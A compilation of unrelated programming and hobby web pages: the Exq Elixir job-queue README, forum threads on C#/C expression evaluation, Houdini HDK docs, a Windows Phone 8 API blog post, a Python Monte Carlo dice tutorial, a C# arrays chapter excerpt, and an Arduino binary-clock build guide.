If you prefer video instructions, check out the screencast on elixircasts.io, which details how to install and use the Exq library.

Add :exq to your mix.exs deps (replace the version with the latest hex.pm package version):

defp deps do
  [
    # ... other deps
    {:exq, "~> 0.14.0"}
  ]
end

Then run mix deps.get.

By default, Exq will use configuration from your config.exs file. You can use this to configure your Redis host, port, and password, as well as the namespace (which helps isolate the data in Redis). If you would like to specify your options as a Redis URL, that is also an option using the url config key (in which case you would not need to pass the other Redis options). Configuration options may optionally be given in the {:system, "VARNAME"} format, which will resolve to the runtime environment value.

Other options include:

- queues: specifies which queues Exq will listen to for new jobs.
- concurrency: lets you configure the number of concurrent workers that will be allowed, or :infinite to disable any throttling.
- name: allows you to customize Exq's registered name, similar to using Exq.start_link([name: Name]). The default is Exq.
- start_on_application: if false, Exq won't be started automatically when booting up your application.
You can start it with Exq.start_link/1.

- shutdown_timeout: the number of milliseconds to wait for workers to finish processing jobs when the application is shutting down. It defaults to 5000 ms.
- mode: can be used to control which components of Exq are started. This is useful if you want to only enqueue jobs in one node and run the workers in a different node.
  - :default - starts the worker, enqueuer and API.
  - :enqueuer - starts only the enqueuer.
  - :api - starts only the API.
  - [:api, :enqueuer] - starts both the enqueuer and API.
- backoff: allows you to customize the backoff time used for retries when a job fails. By default, an exponential time scale based on the job's retry_count is used. To change the default behavior, create a new module which implements Exq.Backoff.Behaviour and set the backoff option value to the module name.

config :exq,
  name: Exq,
  host: "127.0.0.1",
  port: 6379,
  password: "optional_redis_auth",
  namespace: "exq",
  concurrency: :infinite,
  queues: ["default"],
  poll_timeout: 50,
  scheduler_poll_timeout: 200,
  scheduler_enable: true,
  max_retries: 25,
  mode: :default,
  shutdown_timeout: 5000

Exq supports a concurrency setting per queue. You can specify the same concurrency option to apply to each queue, or specify it on a per-queue basis.

Concurrency for each queue will be set at 1000:

config :exq,
  host: "127.0.0.1",
  port: 6379,
  namespace: "exq",
  concurrency: 1000,
  queues: ["default"]

Concurrency for q1 is set at 10_000 while q2 is set at 10:

config :exq,
  host: "127.0.0.1",
  port: 6379,
  namespace: "exq",
  queues: [{"q1", 10_000}, {"q2", 10}]

Exq will automatically retry failed jobs, using an exponential backoff timing similar to Sidekiq or delayed_job. It can be configured via these settings:

config :exq,
  host: "127.0.0.1",
  port: 6379,
  ...
  scheduler_enable: true,
  max_retries: 25

Note that scheduler_enable has to be set to true and max_retries should be greater than 0.
Any job that has failed more than max_retries times will be moved to dead jobs queue. Dead jobs could be manually re-enqueued via Sidekiq UI. Max size and timeout of dead jobs queue can be configured via these settings: config :exq, dead_max_jobs: 10_000, dead_timeout_in_seconds: 180 * 24 * 60 * 60, # 6 months You can add Exq into your OTP application list, and it will start an instance of Exq along with your application startup. It will use the configuration from your config.exs file. def application do [ applications: [:logger, :exq], #other stuff... ] end When using Exq through OTP, it will register a process under the name Elixir.Exq - you can use this atom where expecting a process name in the Exq module. If you would like to control Exq startup, you can configure Exq to not start anything on application start. For example, if you are using Exq along with Phoenix, and your workers are accessing the database or other resources, it is recommended to disable Exq startup and manually add it to the supervision tree. This can be done by setting start_on_application to false and adding it to your supervision tree: config :exq, start_on_application: false # Define workers and child supervisors to be supervised children = [ # Start the Ecto repository supervisor(MyApp.Repo, []), # Start the endpoint when the application starts supervisor(MyApp.Endpoint, []), supervisor(Exq, []), ] Exq uses Redix client for communication with redis server. The client can be configured to use sentinel via redis_options. Note: you need to have Redix 0.9.0+. 
config :exq,
  redis_options: [
    sentinel: [sentinels: [[host: "127.0.0.1", port: 6666]], group: "exq"],
    database: 0,
    password: nil,
    timeout: 5000,
    name: Exq.Redis.Client,
    socket_opts: []
  ]

If you'd like to try Exq out in the iex console, you can do this by typing:

> mix deps.get

and then:

> iex -S mix

You can run Exq standalone from the command line. To run it:

> mix do app.start, exq.run

To enqueue jobs:

{:ok, ack} = Exq.enqueue(Exq, "default", MyWorker, ["arg1", "arg2"])
{:ok, ack} = Exq.enqueue(Exq, "default", "MyWorker", ["arg1", "arg2"])

## Don't retry the job for this worker
{:ok, ack} = Exq.enqueue(Exq, "default", MyWorker, ["arg1", "arg2"], max_retries: 0)

## max_retries = 10; this overrides :max_retries in the config
{:ok, ack} = Exq.enqueue(Exq, "default", MyWorker, ["arg1", "arg2"], max_retries: 10)

In this example, "arg1" will get passed as the first argument to the perform method in your worker, "arg2" will be the second argument, etc.

You can also enqueue jobs without starting workers:

{:ok, sup} = Exq.Enqueuer.start_link([port: 6379])
{:ok, ack} = Exq.Enqueuer.enqueue(Exq.Enqueuer, "default", MyWorker, [])

You can also schedule jobs to start at a future time. You need to make sure scheduler_enable is set to true.

Schedule a job to start in 5 minutes:

{:ok, ack} = Exq.enqueue_in(Exq, "default", 300, MyWorker, ["arg1", "arg2"])

Schedule a job to start at 8am 2015-12-25 UTC:

time = Timex.now() |> Timex.shift(days: 8)
{:ok, ack} = Exq.enqueue_at(Exq, "default", time, MyWorker, ["arg1", "arg2"])

To create a worker, create an Elixir module matching the worker name that will be enqueued. To process a job with "MyWorker", create a MyWorker module. Note that perform also needs to match the number of arguments.

Here is an example of a worker:

defmodule MyWorker do
  def perform do
  end
end

We could enqueue a job to this worker:

{:ok, jid} = Exq.enqueue(Exq, "default", MyWorker, [])

The perform method will be called with matching args.
For example: {:ok, jid} = Exq.enqueue(Exq, "default", "MyWorker", [arg1, arg2]) Would match: defmodule MyWorker do def perform(arg1, arg2) do end end If you'd like to get Job metadata information from a worker, you can call worker_job from within the worker: defmodule MyWorker do def perform(arg1, arg2) do # get job metadata job = Exq.worker_job() end end The list of queues that are being monitored by Exq is determined by the config.exs file or the parameters passed to Exq.start_link. However, we can also dynamically add and remove queue subscriptions after Exq has started. To subscribe to a new queue: # last arg is optional and is the max concurrency for the queue :ok = Exq.subscribe(Exq, "new_queue_name", 10) To unsubscribe from a queue: :ok = Exq.unsubscribe(Exq, "queue_to_unsubscribe") To unsubscribe from all queues: :ok = Exq.unsubscribe_all(Exq) If you'd like to customize worker execution and/or create plugins like Sidekiq/Resque have, Exq supports custom middleware. The first step would be to define the middleware in config.exs and add your middleware into the chain: middleware: [Exq.Middleware.Stats, Exq.Middleware.Job, Exq.Middleware.Manager, Exq.Middleware.Logger] You can then create a module that implements the middleware behavior and defines before_work, after_processed_work and after_failed_work functions. You can also halt execution of the chain as well. For a simple example of middleware implementation, see the Exq Logger Middleware. If you would like to use Exq alongside Phoenix and Ecto, add :exq to your mix.exs application list: def application do [ mod: {Chat, []}, applications: [:phoenix, :phoenix_html, :cowboy, :logger, :exq] ] end Assuming you will be accessing the database from Exq workers, you will want to lower the concurrency level for those workers, as they are using a finite pool of connections and can potentially back up and time out. 
You can lower this through the concurrency setting, or perhaps use a different queue for database workers with a lower concurrency just for that queue. Inside your worker, you would then be able to use the Repo to work with the database:

defmodule Worker do
  def perform do
    HelloPhoenix.Repo.insert!(%HelloPhoenix.User{name: "Hello", email: "[email protected]"})
  end
end

To use Exq alongside Sidekiq / Resque, make sure the namespaces configured in Exq match the namespaces you are using in Sidekiq. By default, Exq will use the exq namespace, so you will have to change that. Another option is to modify Sidekiq to use the Exq namespace in the Sidekiq initializer in your Ruby project:

Sidekiq.configure_server do |config|
  config.redis = { url: 'redis://127.0.0.1:6379', namespace: 'exq' }
end

Sidekiq.configure_client do |config|
  config.redis = { url: 'redis://127.0.0.1:6379', namespace: 'exq' }
end

For an implementation example, see sineed's demo app illustrating Sidekiq-to-Exq communication.

If you would like to exclusively send some jobs from Sidekiq to Exq as your migration strategy, you should create queue(s) that are listened to only by Exq (and configure those in the queue section of the Exq config). Make sure they are not configured to be listened to in Sidekiq, otherwise Sidekiq will also take jobs off those queues. You can still enqueue jobs to such a queue from Sidekiq even though it is not being monitored there:

Sidekiq::Client.push('queue' => 'elixir_queue', 'class' => 'ElixirWorker', 'args' => ['foo', 'bar'])

By default, your Redis server could be open to the world: Redis comes with no password authentication, and some hosting companies leave the Redis port accessible externally. This means that anyone can read data on the queue as well as pass in data to be run. Obviously this is not desired, so please secure your Redis installation by following guides such as the Digital Ocean Redis Security Guide.
A node can be stopped unexpectedly while processing jobs due to various reasons like deployment, system crash, OOM, etc. This could leave jobs in the in-progress state. Exq comes with two mechanisms to handle this situation.

Exq identifies each node using an identifier. By default, the machine's hostname is used as the identifier. When a node comes back online after a crash, it will first check if there are any in-progress jobs for its identifier. Note that it will only re-enqueue jobs with the same identifier. There are environments like Heroku or Kubernetes where the hostname changes on each deployment. In those cases, the default identifier can be overridden:

config :exq,
  node_identifier: MyApp.CustomNodeIdentifier

defmodule MyApp.CustomNodeIdentifier do
  @behaviour Exq.NodeIdentifier.Behaviour

  def node_id do
    # return node ID, perhaps from an environment variable, etc.
    System.get_env("NODE_ID")
  end
end

Same-node recovery is straightforward and works well if the number of worker nodes is fixed. There are use cases that need the worker nodes to be autoscaled based on the workload. In those situations, a node that goes down might not come back for a very long period. The heartbeat mechanism helps in these cases. Each node registers a heartbeat at a regular interval. If any node misses 5 consecutive heartbeats, it will be considered dead, and all the in-progress jobs belonging to that node will be re-enqueued. This feature is disabled by default and can be enabled using the following config:

config :exq,
  heartbeat_enable: true,
  heartbeat_interval: 60_000,
  missed_heartbeats_allowed: 5

Exq has a separate repo, exq_ui, which provides a web UI to monitor your workers. See that repo for more details.

Typically, Exq will start as part of the application along with the configuration you have set. However, you can also start Exq manually and set your own configuration per instance.
Here is an example of how to start Exq manually:

{:ok, sup} = Exq.start_link

To connect with custom configuration options (if you need multiple instances of Exq, for example), you can pass options to start_link:

{:ok, sup} = Exq.start_link([host: "127.0.0.1", port: 6379, namespace: "x"])

By default, Exq will register itself under the Elixir.Exq atom. You can change this by passing in a name parameter:

{:ok, exq} = Exq.start_link(name: Exq.Custom)

The Exq.Mock module provides a few options for testing your workers:

# change queue_adapter in config/test.exs
config :exq, queue_adapter: Exq.Adapters.Queue.Mock

# start the mock server in your test_helper.exs
Exq.Mock.start_link(mode: :redis)

Exq.Mock currently supports three modes. The default mode can be provided in the Exq.Mock.start_link call, and the mode can be overridden for each test by calling Exq.Mock.set_mode(:fake).

- :redis - could be used for integration testing. Doesn't support the async: true option.
- :fake - jobs get enqueued in a local queue and never get executed. Exq.Mock.jobs() returns all the jobs. Supports the async: true option.
- :inline - jobs get executed in the same process. Supports the async: true option.

To donate, send to:

Bitcoin (BTC): 17j52Veb8qRmVKVvTDijVtmRXvTUpsAWHv
Ethereum (ETH): 0xA0add27EBdB4394E15b7d1F84D4173aDE1b5fBB3

For issues, please submit a Github issue with steps on how to reproduce the problem. Contributions are welcome. Tests are encouraged.
To run tests / ensure your changes have not caused any regressions: mix test --no-start To run the full suite, including failure conditions (can have some false negatives): mix test --trace --include failure_scenarios:true --no-start Anantha Kumaran / @ananthakumaran (Lead) Justin McNally (j-mcnally) (structtv), zhongwencool (zhongwencool), Joe Webb (ImJoeWebb), Chelsea Robb (chelsea), Nick Sanders (nicksanders), Nick Gal (nickgal), Ben Wilson (benwilson512), Mike Lawlor (disbelief), colbyh (colbyh), Udo Kramer (optikfluffel), Andreas Franzén (triptec),Josh Kalderimis (joshk), Daniel Perez (tuvistavie), Victor Rodrigues (rodrigues), Denis Tataurov (sineed), Joe Honzawa (Joe-noh), Aaron Jensen (aaronjensen), Andrew Vy (andrewvy), David Le (dl103), Roman Smirnov (romul), Thomas Athanas (typicalpixel), Wen Li (wli0503), Akshay (akki91), Rob Gilson (D1plo1d), edmz (edmz), and Benjamin Tan Wei Hao (benjamintanwei.
https://awesomeopensource.com/project/akira/exq
ScanIAm wrote:
Console.WriteLine(new String("Bob").Length);

The part that concerns me is the accessing of the function 'Length' when you don't really know that the new String has actually been created.

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            System.Console.WriteLine(new System.String('c', 10).Length);
        }
    }
}

Here you are telling the runtime to create a new object of type String by calling the constructor with the provided parameters, get the Length property, and pass a copy of it to the Console.WriteLine function. From there it doesn't matter what happens to the String object, because it is no longer needed; the WriteLine function has its own copy (because it's a value type) of what we wanted, so no worries.

Am I right, guys?
https://channel9.msdn.com/Forums/TechOff/259414-is-new-objectproperty-or-new-objectmethod-a-good-idea?page=2
#include <GU_RandomPoint.h>

Definition at line 24 of file GU_RandomPoint.h.

Random Point Generation.

This method generates random points from the primitives in the detail.

- gdp - geometry containing the primitives (and which will contain the points)
- npoints - the number of points to generate
- seed - random number seed
- probability - a probability array. There should be one entry per primitive, which determines the probability of that primitive having a point generated from it.
- group - optionally, only generate from this group of primitives
- prim_num - store the primitive number associated with the scattered point
- prim_uv - store the primitive's u/v associated with the point

Points will be generated using as close to a uniform distribution as possible (in uv space on the primitives). The point locations should remain constant based on primitive number, regardless of shearing or scaling.

This method generates random points from the points in the detail.

- dstgdp - geometry which will contain the generated points
- srcgdp - geometry which contains the source points (can be the same as dstgdp)
- srcptgrp - the source point group from which to generate points
- ptsperpt - whether the npts parameter indicates the total number of points to generate or the number per point
- npoints - the number of points to generate (total or per-point)
- seed - random number seed
- ptnum - store the point number of the source point
- ptidx - store the index for each point within a particular source point. For example, if a particular source point generates ten points, this attribute's values will range from 0-9.
- emit - an attribute that holds the probability for each source point, which determines the probability of that point having points generated from it
- attribs - a pattern of attributes to copy from the source points to the generated points

Returns a contiguous range containing the generated points.

In ptsperpt mode, the source point's "id" attribute will be used for stable random probability generation.
http://www.sidefx.com/docs/hdk/class_g_u___random_point.html
My C/C++ professor mentioned in class that many compilers cannot properly evaluate the expression i++ + i and some permutations of it, so I decided to test that out in Visual Studio with a small program:

    #include <stdio.h>

    int main(void)
    {
        int i = 4;
        printf("%i", i++ + i);
        return 0;
    }

It returns 8. It should return 9. Why does it return 8?

Why should it return 9? i++ is evaluated AFTER printf. printf("%i", ++i + i) would return 9.

Um, are you sure about that? Surely for i++ + i it should go:
i++ equates to 4 (then increments i to 5)
+ i equates to 9
then printf should display the result of 9.
For ++i + i it'd be:
++i (increments i to 5) and equates to 5
+ i equates to 10
Although I may be wrong, I always did hate pre/postfix incrementing when mixed with other operators.

- AndyC wrote: Um, are you sure about that? Surely for i++ + i it should go:

It should, all things being equal. But thanks to the malarky called sequence points, it isn't the case. Basically, about expressions with side effects like i++, C guarantees only that the side effects will be completed at a sequence point (section 1.9, paragraph 7: "At certain specified points in the execution sequence called sequence points, all side effects of previous evaluations shall be complete and no side effects of subsequent evaluations shall have taken place" - that's the C++ standard, but I believe the same applies for C). The standard specifies where sequence points exist, which includes at the end of a full expression (1.9 paragraph 16) but not inside a subexpression. As such, the result of the side effect of i++ is only guaranteed to be visible after the full expression i++ + i has been evaluated. Because the standard also doesn't guarantee that the side effects won't be visible yet, the statement above is undefined by the standard and therefore compiler dependent. Some compilers might return 8, others might return 9. As such, I would strongly recommend against having those kinds of expressions in your program.

I wonder what i++ + ++i would evaluate to...

Begs the question, how much + would a c ++, if a c + could + c?

- TommyCarlier wrote: I wonder what i++ + ++i would evaluate to...

Sven already gave you all the information you need to answer that. It's undefined. Not to mention evil.

- TommyCarlier wrote: I wonder what i++ + ++i would evaluate to...

Going by operator precedence tables, it should be evaluated as follows, assuming i = 4:
i++ + ++i (i = 4)
4 + ++i (i = 5)
4 + 6 (i = 6)
10 (i = 6)
That's why I never liked the ++ and -- operators; confusing.

But because of the sequence points business, it could also be 9.

- littleguru wrote: That's why I never liked the ++ and -- operators; confusing.

Me too. I always just introduce temporary variables when expressions start to get complex, and work on the principle that the optimizer will most likely make them go away whilst leaving much more readable code. Long live i += 1!

Why does this work in C# then? What's going on beneath that's different?

    class Program
    {
        static void Main(string[] args)
        {
            int i = 4;
            Console.Write(i++ + i);
            Console.ReadLine();
        }
    }

Answer = 9;

- vesuvius wrote: Why does this work in C# then?

Because the C(++) standard has no bearing on the semantics of C#. The C standard defines an abstract machine for the execution of programs, which as I've stated above defines this notion of sequence points, which causes the results of this statement to be implementation-defined. The C# standard also defines an abstract machine (actually, I think it's the CLI standard that defines the abstract machine that C# runs on) but its semantics can be (and probably are) completely different. I have no idea what guarantees it makes considering statements like this; it might guarantee their correctness or it might leave it to the implementation like C does. In the latter case, the fact that Microsoft's compiler does it correctly would be coincidence and not something you can rely on to be true in other compilers (e.g. Mono). But if the standard does define it (I don't know if it does, I haven't read the C# and CLI standards as closely as the C++ standard) you can depend on it. Bottom line: in C (and C++) the result of these expressions is implementation-defined. But that means nothing for other languages.

It's also nonsense like this that made the VB team decide to keep these unary operators out of VB, even though they did introduce the += style operators in VB2005.

Just use: [code]i += i + 1;[/code]

- tgraupmann wrote: Just use: [code]i += i + 1;[/code]

That does something completely different from the original code.

- Sven Groot wrote: But because of the sequence points business, it could also be 9.

It probably is 9 in Visual Studio, but it should be 10.

- Shining Arcanine wrote: It probably is 9 in Visual Studio, but it should be 10.

No, I checked it, it's 10. I guess the ++i causes it to re-read i for the second access (which is sort of required in this case to ensure the correct final value of i).
https://channel9.msdn.com/Forums/TechOff/261908-i--4-i--i-should-return-9-but-returns-8
Jim O'Neil, Technology Evangelist

As I'm sure you've heard, Windows Phone 8 and Windows Store (nee Metro) applications share a common core operating system, and that's great news for developers looking to take advantage of both platforms with a single application or complementary applications. The common core does not, however, mean that the platforms are identical – in fact, only about 1/3 of the Windows Runtime API members are available on both platforms, and there are some APIs that are specific to either Windows Phone or Windows 8 due to the unique experiences or features of the hardware. Then, of course, there's a .NET API available for both Windows Store applications and Windows Phone applications, each a somewhat differing subset of the complete .NET API you've been using to build Windows Forms, WPF and ASP.NET applications for years.

As someone that's been transitioning his skills from core .NET development to the Windows Runtime, I share the pain of trying to make that call to API X and finding it's not supported on Windows 8 (or Windows Phone), or wondering why the namespace that I've used for years refused to resolve in a new Windows 8 app. The good news is that the documentation is there, but there are some subtleties and nuances, so I've pulled this post together to outline some of the tricks and links I've discovered.

First of all, there are the itemized lists of APIs for the new platforms. If you're like me, though, one of your primary research tools is a Bing search, and I'm generally looking for the hit that brings me right to the font of knowledge: the MSDN Library. Once there, it can be a bit tricky to determine if what you're looking at applies to your specific case. Is it available for Windows 8 Store apps? Is it available for Windows Phone? What about Windows Phone 8 versus 7.1?

At the high level, you'll find yourself dealing with three namespaces (Windows, System, and Microsoft), and if you're doing native development, of course, you'll be looking at Win32 API calls.
If you see a Windows namespace, you’ll know it’s for use with Windows 8 or Windows Phone 8 applications – but not necessarily both! Let’s take a look at the LocalFolder property that’s part of the Windows.Storage namespace. If you do a search for LocalFolder, you might end up at one of two landing spots on MSDN. On the left is the documentation page for the LocalFolder property on the Windows Dev Center, and on the right is the documentation for the Windows Phone Dev Center. Windows Dev Center Windows Phone Dev Center This feature is supported on both devices, and you’ll see that the documentation is nearly identical (the Windows Dev Center version provides JavaScript samples, and the phone version does not since JavaScript is not a supported native language on Windows Phone). At the bottom of each, you’ll see the listing of platform support as well: If you run into an API on either site, and there’s not a “Minimum supported” section for client or phone, that’s your cue that you’re not dealing with one of the 2800 or so APIs that are shared in the common core. Unfortunately, the converse isn’t true. Take a look at the page for ApplicationData.RoamingSettings on the Windows Dev Center, and you’ll see a similar statement of support for Windows Phone 8 in the Requirements section. Try to use that feature in a Windows Phone 8 application with code like the following: String bar = ApplicationData.Current.RoamingSettings.Values["foo"] as String; and you’ll get an exception! That’s because the API is technically supported, but it’s not implemented. Bottom line, you can’t use it in a Windows Phone 8 application. Here’s how you’d know: When working with Windows Forms, ASP.NET, WPF, and the other .NET technologies, these two namespaces are your bread and butter. You’ll find a subset of these namespaces available for both Windows 8 and Windows Phone, and there are a few additions to the Microsoft namespace for new features as well (e.g., the Microsoft.Phone namespace). 
You could now find yourself at three different landing pages, such as the documentation incarnations of System.IO below: MSDN Library. Of course, if you hit the Windows Dev Center and you're writing a Windows 8 app, you're all set; likewise, for the Windows Phone Dev Center when writing a Windows Phone app. If you end up at the core MSDN Library, there are actually even more choices, since there's a Version drop down taking you all the way from the current .NET Framework 4.5 back in time to 1.1!

On the page for the .NET Framework 4.5, you'll notice there are glyphs decorating each of the classes, methods, properties, events, etc. The first should be familiar – it differentiates classes from structures from delegates from enumerations and so on, but there are a couple of new glyphs too, as noted below:

This shows that both BinaryReader and BinaryWriter are available (in whole or part) for Windows Store apps, and they are also supported in Portable Class Libraries. Support of a feature in a portable class library bodes well for being able to reuse code across multiple platforms, such as Windows 8 and Windows Phone 8; however, it doesn't guarantee it. While .NET and Windows Store have a considerable amount of overlap in support, as you add additional options – like Windows Phone – to your portable class library target frameworks, the combined API surface decreases.

Looking more closely at BinaryReader, the Version Information section (toward the bottom of the page) provides additional detail on the applicability of the class:

This works well for Windows Store applications, but you'll note that there is no mention of Windows Phone support here, even though BinaryReader is absolutely supported on that platform. In fact, Directory, which is neither available for Windows Store nor for use in a portable class library, is supported in Windows Phone, yet the core MSDN documentation wouldn't really clue you in to that.
If you're using Win32 APIs (let's use FlushFileBuffers as an example), Windows Store support is noted in the Requirements section at the end of the documentation page. FlushFileBuffers is also available on Windows Phone 8, though, and the way you'd know that is by looking more closely at the Remarks section, which includes this callout:

As you might note, that's nearly the opposite of the approach taken for the Windows namespace, where the Requirements section may indicate support for Windows Phone 8 but the Remarks section shows it's actually not implemented and will throw an exception.

If you've read the entire post, that's probably more info than you cared to know, and I do suspect the various documentation 'centers' will align as they evolve over time. For now, if you're just writing Windows Store apps, be sure to navigate to the Windows Dev Center pages; likewise, visit the Windows Phone Dev Center if you're just writing Windows Phone 8 apps. But, if you're working to reuse your code across both target platforms, you may want to file this post away so you can properly decode what you can and can't use across the two.
http://blogs.msdn.com/b/jimoneil/archive/2013/01.aspx?PageIndex=1&PostSortBy=MostViewed
Welcome to the monte carlo simulation experiment with python. Before we begin, we should establish what a monte carlo simulation is. The idea of a monte carlo simulation is to test various outcome possibilities. In reality, only one of the outcome possibilities will play out, but, in terms of risk assessment, any of the possibilities could have occurred.

Monte carlo simulators are often used to assess the risk of a given trading strategy, say with options or stocks. Monte carlo simulators can help drive the point home that outcome is not the only measure of whether or not a choice was good. Choices should not be assessed by their outcomes alone. Instead, the risks and benefits should only be considered at the time the decision was made, without hindsight bias. A monte carlo simulator can help one visualize most or all of the potential outcomes to have a much better idea regarding the risk of a decision.

With that, let's consider a basic example. Here, we will consider a gambling scenario, where a user can "roll" the metaphorical dice for an outcome of 1 to 100. If the user rolls anything from 1-50, the "house" wins. If the user rolls anything from 51 to 99, the "user" wins. If the user rolls a 100, they lose. With this, the house maintains a mere 1% edge, which is much smaller than the typical house edge, as well as the market edge when incorporating trading costs.

For example, consider if you are trading with Scottrade, where the house takes $7 a trade. If you invest $1,000 per stock, this means you have $7 to pay in entry, and $7 to pay in exit, for a total of $14. This puts the "house edge" at 1.4% right out of the gate. Notably, Scottrade is not the actual house. The house is just not you. This means that, on a long term scale, your bets need to do better than 1.4% profit on average, otherwise you will be losing money. Despite the small number, the odds are already against you. Trading is a 50/50 game, especially in the short term.
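The commission arithmetic above is easy to verify directly; a throwaway check using the figures from the text:

```python
position = 1000.0              # dollars invested per stock
commission_per_trade = 7.0     # the house takes $7 a trade
round_trip_cost = 2 * commission_per_trade  # $7 in, $7 out
edge_pct = round_trip_cost / position * 100
print(edge_pct)  # 1.4
```

So before the stock moves at all, the position must gain 1.4% just to break even on costs.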
A monte carlo generator can also help illustrate the flaws of the gambler's fallacy. Many gamblers, and sometimes especially gamblers who understand statistics, fall prey to the gambler's fallacy. The fallacy asserts that, taking something like the flipping of a coin for heads or tails, you have a known 50/50 odds. That said, if you just flipped heads five times in a row, somehow you're more likely to flip tails next. No matter how many heads have preceded, your odds, each time you flip the coin, are 50/50. It is easy to fall into the trap of thinking that, on a long term scale, odds will correlate to 50/50; therefore, if the odds are imbalanced currently, then the next flip's odds are also not 50/50.

So again, with our example in mind: 1-50, house wins. 51-99, user wins. A perfect 100 means house wins. Now, let's begin. We first need to create our dice. For this, we'll employ the pseudo random number generator in python.

    import random

    def rollDice():
        roll = random.randint(1,100)
        return roll

    # Now, just to test our dice, let's roll the dice 100 times.
    x = 0
    while x < 100:
        result = rollDice()
        print(result)
        x+=1
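Building on rollDice, here is a hedged sketch of where this is headed: simulate many rolls and estimate the bettor's win rate, which should land near 49% given the rules above (51-99 wins; 1-50 and 100 lose). The win_rate helper is illustrative, not part of the tutorial's own code.

```python
import random

def rollDice():
    return random.randint(1, 100)

def win_rate(trials, seed=1):
    random.seed(seed)            # fixed seed so the estimate is repeatable
    wins = 0
    for _ in range(trials):
        roll = rollDice()
        if 51 <= roll <= 99:     # rolling exactly 100 is a loss, per the rules
            wins += 1
    return wins / trials

rate = win_rate(100_000)
print(rate)  # close to 0.49
```

With 100,000 trials the estimate is within a fraction of a percent of the true 49% probability, which is exactly the 1% house edge described above made visible.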
https://pythonprogramming.net/monte-carlo-simulator-python/
Chapter 13. Arrays and Collections

In programming, you often need to work with collections of related data. For example, you may have a list of customers and you need a way to store their email addresses. In that case, you can use an array to store the list of strings. In .NET, there are many collection classes that you can use to represent groups of data. In addition, there are various interfaces that you can implement so that you can manipulate your own custom collection of data. This chapter examines:

- Declaring and initializing arrays
- Declaring and using multidimensional arrays
- Declaring a parameter array to allow a variable number of parameters in a function
- Using the various System.Collections namespace interfaces
- Using the different collection classes (such as Dictionary, Stack, and Queue) in .NET

Arrays

An array is an indexed collection of items of the same type. To declare an array, specify the type with a pair of brackets followed by the variable name. The following statements declare three array variables of type int, string, and decimal, respectively:

    int[] num;
    string[] sentences;
    decimal[] values;

Array variables are actually objects. In this example, num, sentences, and values are objects of type System.Array. These statements simply declare the three variables as arrays; the variables are not initialized yet, and at this stage you do not know how many elements are contained within each array. To initialize an array, use the new keyword. The following statements declare and initialize ...
https://www.oreilly.com/library/view/c-2008-programmers/9780470285817/ch13.html
12 Hr Binary Clock, Hours and Minutes Only, DS1307 RTC, I2C, Arduino-Nano

Introduction

For a while now I have wanted to make a binary clock, but after looking around I decided I wanted something just a bit different. So I decided to only display the hours and minutes and only display a 12 hour clock; this means you only need 3 columns and the pattern of LEDs looks neater. Also, with only 11 LEDs you don't need to multiplex: you can just drive the LEDs on the output pins directly.

So with the above in mind I had decided on the design; all I really needed was a suitable case, and while I was sat in front of my computer I realised the small speaker would make an ideal case.

So the basic setup is 11 LEDs and resistors linked to an Arduino Nano, a DS1307 RTC connected to the Nano via I2C, and then two buttons to adjust the hours and minutes, all fitted into a "dumb" speaker using the 5 volt supply from the active USB-powered speaker.

Step 1: The LED Board

To start with, I am using 5mm green LEDs, and these along with the resistors are all soldered onto a small piece of breadboard 17 tracks wide by 17 long. The resistors are 470 ohm, and as you can see in the photos I have soldered 3 on the correct side of the breadboard, but the rest of the resistors and the links were soldered onto the track side (the wrong side). Where the legs of the resistors go over other tracks I have covered them using insulation stripped from single core wire. Have a good look at the photos as there are several track breaks under some resistors. All the resistors have a common ground, which means that 3 of the tracks are ground, which allows the RTC and Arduino Nano to get the ground from the breadboard. I haven't gone into much detail about the LED board as it's not too hard to complete, and you may wish to change the spacing.
The 11 LEDs connect to pins 2 to 12 on the Nano (via a 470 ohm resistor); it doesn't really matter which order you put them in as long as you define the order in the sketch. After I had completed the LEDs, resistors and links, I soldered on different coloured wires to the edge and then checked each LED worked.

Just in case you don't understand binary clocks: the right column displays the units of minutes (0-9), the middle column displays the tens of minutes (0-5) and the left column displays the hours (1-12). In all cases the bottom LED is worth 1, the second is worth 2, the third 4 and the 4th is worth 8; to get the time you add up all the LEDs in the column which are illuminated to give the number.

You may have spotted in one of the pictures above that I managed to pick up the wrong value resistor and solder it in place. I spotted it and replaced it as I did the links.

Step 2: The Arduino Nano

Once the LED board was complete and checked to be working, I then used foam double sided tape and stuck the Arduino Nano on top of the resistors. Then I looped the previously connected wires from the breadboard to the input pins; at this stage I just soldered them all in place neatly, not worrying about the pin order. The last connection from the breadboard to the Nano is the ground; again, to keep it neat, I chose the ground pin next to digital pin 2.

Step 3: RTC DS1307 Connected Via I2C

Next to be wired is the RTC module; the Tiny RTC I2C DS1307 Clock Module was bought from eBay and cost about £1.00. It connects to the Nano via I2C on pins A4 and A5 (A5 SCL and A4 SDA). The module also needs a ground and 5 volts; the ground was from the breadboard and the 5 volts was from the VCC pin next to A4. The RTC module will be foam taped to the speaker, so the wires are about 5" long.

Step 4: Hour and Minute Adjust Buttons
The buttons were what I had lying around; they are a bit too big and I would have preferred black, but as they are mounted on the back it doesn't really matter. I chose to mount the buttons either side of the cable entry hole. The holes had to be 12mm, so I drilled in steps, and at 9mm I filed to the correct size, aligning the holes so they looked even. All the wires were then connected: the buttons to the Nano (via the inline resistors) and the 4 core speaker and USB cable to the relevant connections (ground and "RAW" on the Nano).

The buttons are single pole, normally open (momentary close). They are wired so they are pulled down to ground via a 10K resistor and set to 5 volts when the button is pressed. A 1K resistor is on each input to the Nano. I decided to connect the resistors to the wires as shown in the photos; it's a neat way to connect the switches, and as long as you cover the connections with heatshrink you shouldn't have any problems with shorts. The two buttons connect to A0 and A1, which can be configured as digital by adding 14 to the pin number, so pin A0 is 14 and A1 is 15. One button is for the hour adjust and the other for the minutes; each button just adds either a minute or an hour to the clock.

Step 5: Fitting the Clock Into the Speaker

The speaker looked ideal to house the LEDs, and as the speakers were amplified I could use the USB voltage to power the clock. However, the speaker which has the amplifier and the USB 5 volts didn't have room for the clock, so the "slave" speaker was going to be used to house the clock, and I was then going to run an extra pair of wires from the amplified speaker to the slave to supply the 5 volts. I then had a light bulb moment and realised I could use an old USB keyboard cable and replace the existing 2 wire cable. This meant a little more work, but I think it was worth it. One thing I will point out is that you should not use a mouse cable, as within each core of the 4 wires are fibres of plastic.
So it is a bit harder to work with. The keyboard cable is slightly bigger in diameter, but the cores don't have fibres in them and are a bigger diameter. You can see in the photos the 4 connections I made at each end. In one photo you can see the difference between the mouse cable and keyboard cable: the green wire is the mouse cable and has plastic strands in each core; the red wire is from the keyboard and is tinned copper.

